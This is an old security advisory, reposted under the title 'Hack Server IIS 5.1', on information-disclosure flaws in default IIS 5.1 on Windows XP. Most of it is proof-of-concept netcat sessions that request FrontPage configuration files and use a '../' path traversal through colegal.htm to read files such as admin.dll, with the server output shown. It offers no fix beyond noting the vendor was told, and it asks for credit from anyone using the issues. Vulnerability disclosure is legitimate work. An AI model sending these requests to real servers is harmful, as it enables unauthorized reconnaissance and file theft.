HCE-hack_iis51

Hack Server IIS 5.1

trang này đã được đọc lần

Affected : Windows XP with IIS 5.1 :
Type : MULTIPLE Remote Issues :
Type : Remote/ Local Security Issues :
Date : 10-02-2002 :
Author : NtWaK0 @ www.SafeHack.com :
Credit : NtWaK0 @ www.SafeHack.com :
+---------------------------------------------------------------------------.

+--------------------.
Remote/Local Expoit \
+----------------------`----------------------------------------------------.
:
+-----------. * * * www.SafeHack.com * * * :
Disclaimer \ :
+-------------`-------------------------------------------------------------.
:
This material is presented for informational and entertainment purposes :
only, and to satisfy the curious. Any activities described in this file :
which involve vandalism, theft, or any other illegal activities are :
recounted from third-party conversations. I do not condone or encourage :
vandalism or theft. I do not accept any liability for anything anyone :
does with this information. So, don't shoot the messenger. :
Remember: Use a computer in ways that ensure respect for your fellows. :
:
+-------. :
T.O.C. \ :
+---------`-----------------------------------------------------------------.
:
:
[ Brief History . . . . . . . . . . . . . . . . . . . . . .line 40 ] :
:
[ The Problem . . . . . . . . . . . . . . . . . . . . . . .line 60 ] :
:
[ The Solution . . . . . . . . . . . . . . . . . . . . . .line 156 ] :
:
+-------------. :
Brief History \ :
+---------------`-----------------------------------------------------------.
I had the chance to play for couple of hours with IIS 5.1 on a friend Box, :
thanks to Recon. While I was trying some stuff on IIS 5.1 I MANY problems :
with default IIS 5.1 installation and on files installed by default. :
:
This one is not the same as the one reported earlier. The one reported :
before had to deal with "GET /_vti_bin/shtml.dll". :
A copy of it can be found at : :
http://www.safehack.com/Advisory/shtmldump.txt :
:
+-------+ :
Test OS :
+-------+ :
Tested on Windows XP with IIS 5.1 :
:
:
Please continue to read for more details. :
:
+-----------. :
The Problem \ :
+-------------`-------------------------------------------------------------.
:
>>> 1- Issue <<< :
:
Identify WEB DIR installation. By sending this "GET /_vti_pvt/access.cnf" :
you can identify the web installation. As we all know this is a helpfull :
peace of information if someone is going to attack your web site. :
:
>>> Proof-Of-Concept <<< :
C:\Tool>nc -v -n xx.xx.xxx.xxx 81 :
(UNKNOWN) [xx.xx.xxx.xxx] 81 (?) open :
GET /_vti_pvt/access.cnf :
vti_encoding:SR|utf8-nl :
RealmName:LAMER :
InheritPermissions:false :
PasswordDir:d:\\inetpub\\wwwroot\\_vti_pvt :
:
Their is another security issue with this too. "InheritPermissions:false" :
This will tell security inheritance of that folder. :
:
>>> 2- Issue <<< :
>>> Proof-Of-Concept <<< :
:
C:\Tool>nc -v -n xx.xx.xxx.xxx 81 :
(UNKNOWN) [xx.xx.xxx.xxx] 81 (?) open :
GET /_vti_pvt/botinfs.cnf :
:
vti_encoding:SR|utf8-nl :
D\:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\ :
40\\bots\\vinavbar\\vinavbar.inf:VW|vinavbar :
:
>>> 3- Issue <<< :
:
>>> Proof-Of-Concept <<< :
C:\Tool>nc -v -n xx.xx.xxx.xxx 81 :
(UNKNOWN) [xx.xx.xxx.xxx] 81 (?) open :
GET /_vti_pvt/bots.cnf :
vti_encoding:SR|utf8-nl :
vinavbar:VW|D:\\\\Program\\ Files\\\\Common\\ Files\\\\Microsoft\\ Shared :
\\\\Web\\ Server\\ Extensions\\\\40\\\\bots\\\\vinavbar\\\\vinavbar.inf :
vinavbar E I info N D:\\\\Program\\ Files\\\\Common\\ Files\\\\Microsoft :
\\ Shared\\\\Web\\ Server\\ Extensions\\\\40\\\\bots\\\\vinavbar :
\\\\fp4Avnb.dll :
:
>>> 4- Issue <<< :
Using GET /iishelp/common/colegal.htm you can access other files. under the :
web structure. I did not have chance to test it on file above the :
web structure. Like I said I do not run IIS 5.1 but a friend does. :
One of these days I am going to buy more memory for some of my old box and :
slap on it IIS 5.1 to be able to do better test. :
:
>>> Proof-Of-Concept <<< :
C:\Tool>nc -v -n xx.xx.xxx.xxx 81 :
(UNKNOWN) [xx.xx.xxx.xxx] 81 (?) open :
GET /iishelp/common/colegal.htm:../../../../../_vti_pvt/access.cnf :
vti_encoding:SR|utf8-nl :
RealmName:LAMER :
InheritPermissions:false :
PasswordDir:d:\\inetpub\\wwwroot\\_vti_pvt :
:
writeto.cnf [Extracted From] :
http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/ :
prodtechnol/office/reskit/fp98serk/appendixes/A_SPFILE.asp :
:
Back links for files that can be written to by users of the web, such as :
Save Results Form handler result files. Files that can be written to by :
users of the web have a looser security setting than regular web content. :
:
:
C:\Tool>nc -v -n xx.xx.xxx.xxx 81 :
(UNKNOWN) [xx.xx.xxx.xxx] 81 (?) open :
GET /iishelp/common/colegal.htm:../../../../../_vti_bin/_vti_adm/admin.dll :
MZÉ ? ? + @a ??¦? ¦ -!+?L-!This program cannot be run in DOS mode. :
$ §-Q+Q¦?ïQ¦?ïQ¦?ï3¼,ïU¦?ï¦¼5ïT¦?ïQ¦>ïF¦?ïT¦9ïP¦?ï¦¼4ïS¦?ï¦¼;ïU¦?ïRichQ¦?ï :
PE L?? _; a ?!??? ? 0 c? ? µg ? ? ? ? :
P ? ¿- ? ? ? ? ? ? ? » (? P 0 P? :
:
:
:
C:\Tool>nc -v -n xx.xx.xxx.xxx 81 :
(UNKNOWN) [xx.xx.xxx.xxx] 81 (?) open :
GET /_vti_pvt/linkinfo.cnf :
vti_encoding:SR|utf8-nl :
javascript\:loadhelpfront();:localstart.asp :
javascript\:activate(<%=iver%>);:localstart.asp :
http\://www.safehack.com:index.htm :
/iishelp/common/colegal.htm:localstart.asp :
:
:
:
NOTE: A search on google for "writeto.cnf" Returned alarmed results :
http://www.google.com/search?q=writeto.cnf&hl=en&btnG=Google+Search&meta= :
:
:
+------------. :
The Solution \ :
+--------------`------------------------------------------------------------.
No idea. Vendor was informed. :
If you are going to use the founded issues, credit must be given to the :
author. NtWaK0 @ www.safehack.com :
+---------------------------------------------------------------------------.

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1

iQA/AwUBPGctD/PoW9fFNsN8EQJRmgCfeKmJ70kQpcUI5o/ilPfi55pqaPAAn3ow
xwdo0mcGchpRROsat8znpoku
=8Ost
-----END PGP SIGNATURE-----